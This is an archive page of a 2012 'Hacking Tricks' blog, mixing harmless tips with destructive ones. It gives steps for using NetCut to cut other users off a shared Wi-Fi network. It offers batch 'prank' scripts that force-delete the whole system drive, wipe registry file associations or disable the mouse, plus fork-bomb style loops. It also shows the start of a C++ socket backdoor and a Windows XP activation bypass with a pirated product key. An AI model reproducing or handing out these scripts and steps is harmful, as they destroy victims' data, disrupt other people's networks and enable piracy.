Showing posts with label Hacking Tricks. Show all posts
Showing posts with label Hacking Tricks. Show all posts

Thursday, 31 May 2012

Some Amazing Things You Can Do With Google



The Days Are Gone When Google Was Used  As An Search Engine 

Only. In Recent Years Google Has Become Faster, Smarter And 

Powerful Than Ever. Apart Of ‘Googling’ Keywords, You Junkies 

Can Actually Do A Lot Of Productive Work On It. In This Article, 

We Will Be Exploring The ‘Art Of Googling’  Which Can Help You 

Junkies Carry Out Your Day To Day Task With Ease.





1. Carry Out Arithmetic And Logical Equations





Google’s Clever Algorithms Lets You Carry Out Arithmetic 

And Logical Equation Solving In A Snap. 





Monday, 5 March 2012

Hack Internet Connection Of Wifi Users

Hack Internet Connection Of Wifi Users



Guys, we have noticed that whenever we use the internet connection on shared server like wifi in our college or WLAN in office, the speed we got is too slow somewhere and it really irritate. This is because of the more crowd on the server than its capacity.  So there's a trick to increase the speed by blocking others internet connection on that server.
                           

 lets start to increase the speed.


 Step 1-   First of all download a software named netcut. 
 
Step 2- Goto this link http://www.filecluster.com/downloads/NetCut.html
               from there you will get it and install it on your system.
 Step 3- Now open the netcut. and you will be able to see all the internet users on that server. You can also identify any user by his/her ip address and physical address shown there.
 Step 4- Now select the user or users you want to cutoff from the internet. Then click on
 cutoff  option like shown in pic.


 Step 5- After blocking some of the users you will notice that the internet speed on your system  will be increase.
 Step 6- You can unblock the users by selecting the
 resumebutton.
ENJOY HACKING -) 

Make a virus that disable Mouse

Make a virus that disable Mouse






We will be making a batch virus which is harmfull it will disable your mouse so think before trying it on yourself.

  • Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  • Save this file as  virus.bat
  • Done you just created your virus.

COMMAND PROMPT TRICK

COMMAND PROMPT TRICK





The blue screen of Death [this might be dangerous]
*The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again


CODE
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00




-Stupidity Shutdown
*This pops up a funny message then will shutdown the computer


CODE
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c "Error! You are too stupid!" -s -t 10


-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)


CODE
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE


-Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*

CODE
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


-Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*
CODE
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


-Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*
CODE
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


-Endless Backspace
*This makes it so the backspace key is constantly being pressed*
CODE
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop


-Popping CD Drives
*This will make the CD drives constantly pop out*
CODE
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

Change your IP ADDRESS

Change your IP ADDRESS





i will show you how to change ip address in less then a minute. For now it will take 2 to 3 minutes but with some practice you can do this within a minute.


  • Click on "Start" in the bottom left corner of the screen.
  • Click on "RUN"
  • Type in "command" and click OK

   
   You should be now at MSDOS prompt Screen


  • Type "ipconfig /release" just like that, and press "enter"
  • Type "exit" and leave the prompt
  • Right-click on "Network Places" or "My Network Places" on your desktop.
  • Click on "properties"

     
Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.



  •  Right click on "Local Area Connection" and click "properties"
  • Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
  • Click on "Use the following IP address" under the "General" tab
  • Create an IP address (It doesn't matter what it is)
  • Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
  • Press the "Ok" button here
  • Hit the "Ok" button again

   
  Now you should be back to the "Local Area Connection" screen.

  • Right-click back on "Local Area Connection" and go to properties again.
  • Go back to the "TCP/IP" settings
  • This time, select "Obtain an IP address automatically"
  • Click on "Ok"
  • Hit "Ok" again.
  • Now you have a New IP address.

Protect Your Computer Using A USB

Protect Your Computer Using A USB


Now you can protect you PC by just using a USB flash drive. This is possible due to a great software called Predator. Predator locks your PC when you are away, even if your Windows session is still opened. It uses the USB flash drive as an access point. Using the software is really very easy.


Using Predator

· First of all insert the USB drive.
· Then run Predator Software.
· Now just do your work.
· When you want to leave the computer for some other work just remove the USB  drive. Once it is removed, the keyboard and mouse are disabled and the screen darkens.
· When you return back to your PC, you put the USB flash drive in place and keyboard and mouse are immediately released, and the display is restored.

Features of Predator

· Predator is available in both free and professional versions.
· Predator can send alert messages by Email or by SMS.
· Predator records all security-related events in a log file: start, alarms, stop. By reading this log, you will know if intruders have tried to use your computer while you have been away.
· Predator frequently changes the security codes recorded on your USB drive. If an intruder manages to copy your stick, this copy will not work because the codes on your own stick will have changed in the meantime.
· Predator disables the Windows task manager when you unplug the USB drive. Nobody can stop it with Ctrl-Alt-Del.
· Predator disables the CD Autorun feature in Windows, to prevent intruders from running malware on specially crafted CDs.
· Predator lets you regain control of your computer if you lose your stick: when you start the software for the first time, you set a password that will unlock your session if your USB drive is not available.
· Predator can sound an audible alarm if somebody enters an invalid password.
· And finally, Predator can protect several PCs with the same USB flash drive, e.g. your home and office computers.

                                   DOWNLOAD PREDATOR FROM HERE

Sunday, 4 March 2012

CREATE RAGE FACES IN FACEBOOK


CREATE RAGE FACES IN FACEBOOK


·   Troll face: [[171108522930776]]
·   ARE YOU FUCKING KIDDING ME: [[143220739082110]]
·   Not bad Obama: [[169919399735055]]
·   Me Gusta: [[211782832186415]]
·   Mother of God: [[142670085793927]]
·   Cereal Guy: [[170815706323196]]
·   LOL Face: [[168456309878025]]
·   NO Guy: [[167359756658519]]
·   Yao Ming: [[218595638164996]]
·   Derp: [[224812970902314]]
·   Derpina: [[192644604154319]]
·   Forever Alone: [[177903015598419]]
·   Not Bad: [[NotBaad]]
·   Fuck yeah: [[105387672833401]]
·   Challenge accepted: [[100002727365206]]
·   Okay face: [[100002752520227]]
·   Dumb bitch: [[218595638164996]]
·   Poker face: [[129627277060203]]
·   Okay face: [[224812970902314]]
·   Socially awkward penguin: [[98438140742]]
·   Rage face: [[FUUUOFFICIAL]]
·   Lamp: [[100001256102462]]
·   No: [[167359756658519]]
·   MOG: [[142670085793927]]
·   Feel like a sir: [[168040846586189]]
·   Forever alone Christmas: [[125038607580286]]


Basic Backdoor C++


Basic Backdoor C++


---------------------- C++ Code -------------------------->

/*
 Don't forget to link winsock32.lib otherwise your compiler won't understand the sockets
*/

#include <stdio.h> 
#include <stdlib.h>
#include <windows.h>
#include <string.h>


//our variables, we need them globally to use them in all functions
    const char welcome[]="Welcome, enter your password please: ";
    char bufferin[1024]; //the buffer to read data from socket
    char bufferout[65535]; //the buffer to write data to the socket
    int i,port; // i is used for loop , port is going to keep the portnumber
    SOCKET locsock,remsock;  //the sockets we are going to need
    SOCKADDR_IN sinloc,sinrem; //the structures needed for our sockets
    WSADATA wsadata; //wsadata 
    STARTUPINFO startinfo; //startupinfo structure for CreateProcess
    SECURITY_ATTRIBUTES secat; //security attributes structure needed for CreateProcess
    PROCESS_INFORMATION procinfo; //process info struct needed for CreateProcess
    int bytesWritten;  //number of bytes written gets stored here
    DWORD bytesRead,avail,exitcode; //number of bytes read, number of bytes available 
                                    //and the exitcode


10 REASONS WHY WEBSITE GET HACKED

10 REASONS WHY WEBSITE GET HACKED





1. Cross site scripting (XSS)

The problem: The “most prevalent and pernicious” Web application security vulnerability, XSS flaws happen when an application sends user data to a Web browser without first validating or encoding the content. This lets hackers execute malicious scripts in a browser, letting them hijack user sessions, deface Web sites, insert hostile content and conduct phishing and malware attacks.Attacks are usually executed with JavaScript, letting hackers manipulate any aspect of a page. In a worst-case scenario, a hacker could steal information and impersonate a user on a bank’s Web site, according to Snyder.
Real-world example: PayPal was targeted last year when attackers redirected PayPal visitors to a page warning users their accounts had been compromised. Victims were redirected to a phishing site and prompted to enter PayPal login information, Social Security numbers and credit card details. PayPal said it closed the vulnerability in June 2006.
How to protect users: Use a whitelist to validate all incoming data, which rejects any data that’s not specified on the whitelist as being good. This approach is the opposite of blacklisting, which rejects only inputs known to be bad. Additionally, use appropriate encoding of all output data. “Validation allows the detection of attacks, and encoding prevents any successful script injection from running in the browser,” OWASP says.

2. Injection flaws         
                                   
The problem: When user-supplied data is sent to interpreters as part of a command or query, hackers trick the interpreter — which interprets text-based commands — into executing unintended commands. “Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application,” OWASP writes. “In the worst-case scenario, these flaws allow an attacker to completely compromise the application and the underlying systems, even bypassing deeply nested firewalled environments.”
Real-world example: Russian hackers broke into a Rhode Island government Web site to steal credit card data in January 2006. Hackers claimed the SQL injection attack stole 53,000 credit card numbers, while the hosting service provider claims it was only 4,113.
How to protect users: Avoid using interpreters if possible. “If you must invoke an interpreter, the key method to avoid injections is the use of safe APIs, such as strongly typed parameterized queries and object relational mapping libraries,” OWASP writes.

How to Disable Published TimeLine from Facebook Account

How to Disable Published TimeLine from Facebook Account








So You Want to disable facebook time line.....

Follow the instructions Carefully.... 

1. Click on Account Settings...
2. then Click on Security Tab... and Deactivate your account.... :D  I am not kidding... dude..
3. After deactivation.. Activate your account again after atleast 10 hours.. 
4. and here we done.... Your Activated Account is now.. Without Facebook Timeline and on News Feed section.. Facebook will suggest you to activate Time line again... if you wish to activate then click there (Hope you will not click there) otherwise your Facebook Profile is now without Time Line... :)

You Can also reactivate time line whenever you want... so that's Cool and verified trick.. 

Download Any Torrent File With IDM

Download Any Torrent File With IDM 







Follow Easy Steps:
1. First of all , you have to download the torrent file(.torrent) which you want to download.

2. Then just go to the website http://www.torcache.net and upload the torrent file that you have just downloaded and click on the cache! button.

3. This will give you a new torrent file. You just have to copy the link of the new torrent file from the opened window.

4. Then go to the website http://www.torrific.com and create an account there(in case you don’t have) and login to your account. Then paste the address of the new torrent obtained in step 3 and click on Get button.

5. Now you will get the list of available files present in that torrent file. Then click on the initiate bittorrent transmission button. This will give the full option to download the file. Just click on any link and you can see the download manager-IDM popping out for downloading the file.

Now enjoy the ultimate Speed of IDM for downloading torrents too…
Please share this, if you liked it...

Saturday, 11 February 2012

BEST WAY TO SCAN YOUR WEBSITES AGAINST VIRUS

To know that your websites is free from viruses them scan them at




                               http://sitecheck.sucuri.net

Sunday, 5 February 2012

Rename your Recycle bin

Rename your Recycle bin





1. Go to Start > Run

2. Type in regedit this will open Registry Editor.

3. Go to HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
4. Change "Recycle Bin" to whatever you want.

MAKE WINDOWS XP GENUINE


MAKE WINDOWS XP GENUINE


Hi Guyz I have A tricks to make xp genuine now lets start friend

1st is here


1-Click Start, and then click Run.


2-In the Open box, type regedit, and then click OK.


3-In the left pane, locate and then click the following registry key:


HKEY_LOCAL_MACHINE\Software\Microsoft\… Version\WPAEvents


4-In the right pane, right-click OOBETimer, and then click Modify.


5-Change at least one digit of this value to deactivate Windows.


6-Click Start, and then click Run.


7-In the Open box, type the following command, and then click OK.


%systemroot%\system32\oobe\msoobe.exe /a


8-Click Yes, I want to telephone a customer service representative to activate Windows, and then click Next.


9-Click Change Product key.


10-Now enter this key and you're done.


*****************************
V2C47-MK7JD-3R89F-D2KXW-VPK3J
*****************************


Now...now your Winxp is Orginal.



Type the new product key in the New key boxes, and then click Update.


If you are returned to the previous window, click Remind me later, and then restart the computer.


Click OK

Twitter Bird Gadget